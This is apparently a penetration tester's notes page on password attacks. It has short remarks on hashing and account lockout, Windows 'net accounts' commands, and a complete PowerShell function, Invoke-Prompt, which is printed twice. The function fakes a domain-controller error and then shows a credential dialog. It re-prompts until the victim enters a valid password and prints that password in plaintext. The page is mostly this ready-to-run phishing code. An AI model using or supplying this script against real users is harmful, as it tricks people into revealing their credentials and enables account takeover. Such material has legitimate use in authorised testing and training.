Password Attacks

File hashing should be fast - used to determine integrity

Password hashing should be SLOW - used to increase amount of work for cracking

Be careful not to lock out legitimate users, as this will impact operational needs of the target

Check windows password settings

net accounts
net accounts /domain

Sometimes, we can just ask for creds!

# POC from greg.foss[at]owasp.org
# @enigma0x3
# Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

function Invoke-Prompt {
    [CmdletBinding()]
    Param (
        [Switch] $ProcCreateWait,
        [String] $MsgText = 'Lost contact with the Domain Controller.',
        [String] $IconType = 'Critical',
        [String] $Title = 'ERROR - 0xA801B720'
    )
    Add-Type -AssemblyName Microsoft.VisualBasic
    Add-Type -assemblyname System.DirectoryServices.AccountManagement
    $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
    
    if($MsgText -and $($MsgText -ne '')){
        $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title)
    }
    
    $c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
    
    if($credential){
           while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True){
              $credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
          }
        "[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password
    }
    else{
        "[!] User closed credential prompt"
    }
}

PreviousPHP NextBrute Forcing

Last updated 3 years ago

Was this helpful?

# POC from greg.foss[at]owasp.org # @enigma0x3 # Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/ # https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/ function Invoke-Prompt { [CmdletBinding()] Param ( [Switch] $ProcCreateWait, [String] $MsgText = 'Lost contact with the Domain Controller.', [String] $IconType = 'Critical', [String] $Title = 'ERROR - 0xA801B720' ) Add-Type -AssemblyName Microsoft.VisualBasic Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) if($MsgText -and $($MsgText -ne '')){ $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title) } $c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName") if($credential){ while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True){ $credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","") } "[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password } else{ "[!] User closed credential prompt" } }